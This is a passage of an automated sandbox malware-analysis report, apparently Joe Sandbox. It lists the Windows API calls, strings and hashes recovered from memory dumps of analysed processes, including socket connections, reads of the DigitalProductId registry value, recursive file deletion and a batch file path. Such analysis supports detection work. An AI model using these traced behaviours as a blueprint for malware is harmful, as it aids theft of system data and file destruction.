                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandleOpen$DeleteManager
                                                                                              • String ID: Defghi Klmnopqr Tuv
                                                                                              • API String ID: 204194956-1553144822
                                                                                              • Opcode ID: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                                                                              • Instruction ID: af5df313aa315fefd4782f401c2454f72211a105aee6f81703237d9f712d2b62
                                                                                              • Opcode Fuzzy Hash: 9417cfe2cc993b79d2e3b55ebb6b09adf650dad06d9114a354eaf94673a61dfb
                                                                                              • Instruction Fuzzy Hash: 20E04F3564166177C2222B256D08F5B3B18AFC1B53F050425F741B65B48B78954195B9
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00404D28,0000001A), ref: 00406BDB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406BE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                                                                              • API String ID: 2574300362-1458725802
                                                                                              • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                                                                              • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                                                                              • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                                                                              • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                                                                              APIs
                                                                                              • select.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00403798
                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 004037B1
                                                                                              • recv.WS2_32(00000000,?,00000008,00000000), ref: 004037CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: recvselect
                                                                                              • String ID: Defghi Klmnopqr Tuv
                                                                                              • API String ID: 741273618-1553144822
                                                                                              • Opcode ID: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                                                                              • Instruction ID: d88939a34068f27b08009573b9ec192b3f1388868b9ca5f3c15b88e7a2eb2fcd
                                                                                              • Opcode Fuzzy Hash: 9210cb308e33c3465702e112dd41e11aff726b02e6877597e9f704787e0b536c
                                                                                              • Instruction Fuzzy Hash: 3711A1F16002146BDB209E688DC5FE67AAC9B043A1F508636FA19E71D0E274DE808B94
                                                                                              APIs
                                                                                              • strcmp.MSVCRT ref: 00406731
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                                                                              • sprintf.MSVCRT ref: 004068CD
                                                                                              • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                                                                              • String ID: %u Gbps$KVa7
                                                                                              • API String ID: 3420875952-2796686009
                                                                                              • Opcode ID: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                                                                              • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                                                                              • Opcode Fuzzy Hash: 2e6fa44a5d2f037096ad7b5d024fbd0ea36ba1bcc104164832898df47580a20a
                                                                                              • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00402A4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: WS2_32.dll$htons
                                                                                              • API String ID: 2574300362-178149120
                                                                                              • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                                                                              • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                                                                              • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                                                                              • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                                                                              APIs
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                                                                              • htons.WS2_32 ref: 004086B2
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                                                                              • closesocket.WS2_32(00000000), ref: 004086D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2594110174.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594167310.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594246572.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2594267819.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: closesocketconnecthtonssocket
                                                                                              • String ID:
                                                                                              • API String ID: 3817148366-0
                                                                                              • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                                                                              • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                                                                              • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                                                                              • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA
                                                                                              APIs
                                                                                                • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                                                                                • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 0043308A
                                                                                                • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                                                                                • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                                                                              • RegQueryValueExA.KERNEL32(00000000,DigitalProductId,00000000,00000000,?,?,00465CDE), ref: 00433117
                                                                                              • SystemTimeToVariantTime.OLEAUT32(00263B80,?), ref: 00433856
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00433898
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-12:00) International Date Line West), ref: 004338AD
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-11:00) Midway Island), ref: 004338C2
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-10:00) Hawaii), ref: 004338D7
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-09:00) Alaska), ref: 004338EC
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-08:00) Pacific time (US & Canada)), ref: 00433901
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-07:00) Mountain time (US & Canada)), ref: 00433916
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-06:00) Central time (US & Canada)), ref: 0043392B
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-05:00) Eastern time (US & Canada)), ref: 00433940
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-04:00) Atlantic time (Canada)), ref: 00433955
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-03:00) Brasilia), ref: 0043396A
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-02:00) Mid-Atlantic), ref: 0043397F
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT-01:00) Cape Verde Is.), ref: 00433994
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+00:00) Greenwich Mean Time), ref: 004339A9
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+01:00) West Central Africa), ref: 004339BE
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+02:00) Vilius, Jerusalem), ref: 004339D3
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+03:00) Baghdad, Moscow), ref: 004339E8
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+04:00) Abu Dhabi), ref: 004339FD
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+05:00) Islamabad), ref: 00433A12
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+06:00) Almaty), ref: 00433A27
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+07:00) Bangkok, Hanoi, Krasnoyask), ref: 00433A3C
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+08:00) Beijing, Hong Kong), ref: 00433A51
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+09:00) Seoul, Tokyo), ref: 00433A66
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+10:00) Brisbane, Melbourne, Sydney), ref: 00433A7B
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+11:00) Solomon Is.), ref: 00433A90
                                                                                              • SendMessageA.USER32(?,00000143,00000000,(GMT+12:00) Fiji), ref: 00433AA5
                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 00433AAF
                                                                                              • SendMessageA.USER32(?,0000014E,-0000000C,00000000), ref: 0043432F
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00435143
                                                                                              • SendMessageA.USER32(?,00000143,00000000,?), ref: 0043518C
                                                                                              • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,?), ref: 0043520B
                                                                                              • SendMessageA.USER32(?,0000014E,FFFFFFFF,00000000), ref: 0043545D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Time$Open$CallbackDispatcherErrorInformationItemLastQuerySystemUserValueVariantZone
                                                                                              • String ID: !$#$$$%$&$($(GMT$(GMT+$(GMT+00:00) Greenwich Mean Time$(GMT+01:00) West Central Africa$(GMT+02:00) Vilius, Jerusalem$(GMT+03:00) Baghdad, Moscow$(GMT+04:00) Abu Dhabi$(GMT+05:00) Islamabad$(GMT+06:00) Almaty$(GMT+07:00) Bangkok, Hanoi, Krasnoyask$(GMT+08:00) Beijing, Hong Kong$(GMT+09:00) Seoul, Tokyo$(GMT+10:00) Brisbane, Melbourne, Sydney$(GMT+11:00) Solomon Is.$(GMT+12:00) Fiji$(GMT-01:00) Cape Verde Is.$(GMT-02:00) Mid-Atlantic$(GMT-03:00) Brasilia$(GMT-04:00) Atlantic time (Canada)$(GMT-05:00) Eastern time (US & Canada)$(GMT-06:00) Central time (US & Canada)$(GMT-07:00) Mountain time (US & Canada)$(GMT-08:00) Pacific time (US & Canada)$(GMT-09:00) Alaska$(GMT-10:00) Hawaii$(GMT-11:00) Midway Island$(GMT-12:00) International Date Line West$)$0000$00000401$00000402$00000404$00000405$00000406$00000407$00000408$00000409$0000040B$0000040C$0000040D$0000040E$00000410$00000411$00000412$00000413$00000414$00000415$00000416$00000418$00000419$0000041A$0000041B$0000041C$0000041D$0000041E$0000041F$00000421$00000422$00000423$00000424$00000425$00000426$00000427$00000429$0000042A$00000439$0000043E$0000043F$00000440$00000441$0000044B$00000450$0000045A$00000465$00000801$00000804$00000807$00000809$0000080A$0000080C$00000810$00000813$00000816$0000081A$0000081D$0000083E$00000C01$00000C04$00000C07$00000C09$00000C0A$00000C0C$00000C1A$00001001$00001004$00001007$00001009$0000100A$0000100C$00001401$00001404$00001407$00001409$0000140A$0000140C$00001801$00001809$0000180A$0000180C$00001C01$00001C09$00001C0A$00002001$00002009$0000200A$00002401$00002409$0000240A$00002801$00002809$0000280A$00002C01$00002C09$00002C0A$00003001$00003009$0000300A$00003401$00003409$0000340A$00003801$0000380A$00003C01$00003C0A$00004001$0000400A$0000440A$0000480A$00004C0A$0000500A$:00) $Albanian(Albania)$Arabic(Algeria)$Arabic(Bahrain)$Arabic(Egypt)$Arabic(Iraq)$Arabic(Jordan)$Arabic(Kuwait)$Arabic(Lebanon)$Arabic(Libya)$Arabic(Morocco)$Arabic(Oman)$Arabic(Qatar)$Arabic(Saudi Arabia)$Arabic(Syria)$Arabic(Tunisia)$Arabic(United Arab Emirates)$Arabic(Yemen)$BCDFGHJKMPQRTVWXY2346789$Belarusian(Belarus)$Bulgarian(Bulgaria)$C$Chinese(China)$Chinese(Hong Kong SAR)$Chinese(Macau SAR)$Chinese(Singapore)$Chinese(Taiwan)$Croatian(Croatia)$Czech(Czech Republic)$Danish(Denmark)$Default$Dhivehi(Maldives)$DigitalProductId$Dutch(Belgium)$Dutch(The Netherlands)$English(Australia)$English(Belize)$English(Canada)$English(Caribbean)$English(Ireland)$English(Jamaica)$English(New Zealand)$English(Philippines)$English(South Africa)$English(Trinidad and Tobago)$English(United Kingdom)$English(United States)$English(Zimbabwe)$Estonian(Estonia)$Farsi(Iran)$Finnish(Finland)$French(Belgium)$French(Canada)$French(France)$French(Luxembourg)$French(Monaco)$French(Switzerland)$German(Austria)$German(Germany)$German(Liechtenstein)$German(Luxembourg)$German(Switzerland)$Greek(Greece)$Hebrew(Israel)$Hindi(India)$Hungarian(Hungary)$Indonesian(Indonesia)$InstallDate$Italian(Italy)$Italian(Switzerland)$Japanese(Japan)$Kannada(India)$Kazakh(Kazakhstan)$Korean(Korea)$Kyrgyz(Kazakhstan)$Latvian(Latvia)$Lithuanian(Lithuania)$Malay(Brunei)$Malay(Malaysia)$Mongolian(Mongolia)$Norwegian(Norway)$Polish(Poland)$Portuguese(Brazil)$Portuguese(Portugal)$Romanian(Romania)$Russian(Russia)$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\Control\Keyboard Layouts\$SYSTEM\CurrentControlSet\Control\Nls\Language$Serbian(Cyrillic)$Serbian(Latin)$Slovak(Slovakia)$Slovenian(Slovenia)$Spanish(Argenuser)$Spanish(Bolivia)$Spanish(Chile)$Spanish(Colombia)$Spanish(Costa Rica)$Spanish(Dominican Republic)$Spanish(Ecuador)$Spanish(El Salvador)$Spanish(Guatemala)$Spanish(Honduras)$Spanish(Mexico)$Spanish(Nicaragua)$Spanish(Panama)$Spanish(Paraguay)$Spanish(Peru)$Spanish(Puerto Rico)$Spanish(Spain)$Spanish(Uruguay)$Spanish(Venezuela)$Swahili(Kenya)$Swedish(Finland)$Swedish(Sweden)$Syriac(Syria)$Thai(Thailand)$Turkish(Turkey)$Ukrainian(Ukraine)$Vietnamese(Vietnam)$wwww
                                                                                              • API String ID: 3508335397-1490658257
                                                                                              • Opcode ID: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                                                                              • Instruction ID: 11e6bca3a7b78fddd481d42fe835fe7653ca2f41bf506d87efe11ac05451b3a8
                                                                                              • Opcode Fuzzy Hash: 627a35e1b08555edaf0af8ad1688b17534d88a004a0355c9889eb5397b03b424
                                                                                              • Instruction Fuzzy Hash: 7233E275300B00AFC354DF2DC895F5A73E5AFC8718F10861EF85A9B2D2CB78A9468B59
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,0000005C,?,?), ref: 00405423
                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405432
                                                                                              • RemoveDirectoryA.KERNEL32(?), ref: 0040544C
                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040547E
                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0040548E
                                                                                              • FindClose.KERNEL32(?), ref: 004054A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Find$Attributes$CloseDeleteDirectoryFirstNextRemove
                                                                                              • String ID: \*.*$desktop.ini$index.dat
                                                                                              • API String ID: 799748605-3685876507
                                                                                              • Opcode ID: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                                                                              • Instruction ID: 0650860c3c1e2d53bc6fffd3340b65124f85220920b4efda78b7a122019db1cc
                                                                                              • Opcode Fuzzy Hash: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                                                                              • Instruction Fuzzy Hash: D881C170104B429FD310CB24CC48BABB7A8EF85355F148A6EF855972D1EB79D809CF5A
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0045B056
                                                                                              • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                                                                                • Part of subcall function 0045B00F: lstrcpynA.KERNEL32(00000000,?,00000104,0045B0C3,?,?), ref: 0045B034
                                                                                                • Part of subcall function 0045B00F: PathStripToRootA.SHLWAPI(00000000), ref: 0045B03B
                                                                                              • PathIsUNCA.SHLWAPI(?,?,?), ref: 0045B0C6
                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0045B0EA
                                                                                              • CharUpperA.USER32(?), ref: 0045B102
                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0045B11B
                                                                                              • FindClose.KERNEL32(00000000), ref: 0045B127
                                                                                              • lstrlenA.KERNEL32(?), ref: 0045B144
                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 0045B163
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 4080879615-0
                                                                                              • Opcode ID: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                                                                              • Instruction ID: 1ff96bb8ef7605f0caa5a4dd8548b9a5efde3f4e5f2b52bc8e945bc090aef529
                                                                                              • Opcode Fuzzy Hash: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                                                                              • Instruction Fuzzy Hash: 70318171500518EBCB109F64CC88AEF7B78EF4475AF0045AAF915D6251D7788D888F99
                                                                                              APIs
                                                                                              • #17.COMCTL32(?,?,?,?,?,0046429C,000000FF), ref: 00439D71
                                                                                                • Part of subcall function 0045FE1A: InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                                                                              • __time32.LIBCMT ref: 00439D87
                                                                                                • Part of subcall function 0044808D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00448096
                                                                                                • Part of subcall function 0044808D: __aulldiv.LIBCMT ref: 004480B6
                                                                                                • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                                                                                • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                                                                              • FindFirstFileA.KERNEL32(?,?,SystemRoot,?,00000000,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,004C7468), ref: 00439E18
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: FileTime$ErrorExchangeFindFirstInterlockedLastOpenSystem__aulldiv__time32
                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SystemRoot$\system32\winbws.bat
                                                                                              • API String ID: 3390870601-281878756
                                                                                              • Opcode ID: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                                                                              • Instruction ID: 6b44aab606d6ad69af96c057710d905d5c5d9310879aa73593c03cc9d95d0a52
                                                                                              • Opcode Fuzzy Hash: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                                                                              • Instruction Fuzzy Hash: E651C2751087419FC324EF25C895BDFB7A8AF88324F004A1FF45A432D2EB789519CB5A
                                                                                              APIs
                                                                                              • lstrcpyA.KERNEL32(00000800,LOC), ref: 0045F837
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 0045F86A
                                                                                              • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0045F87A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
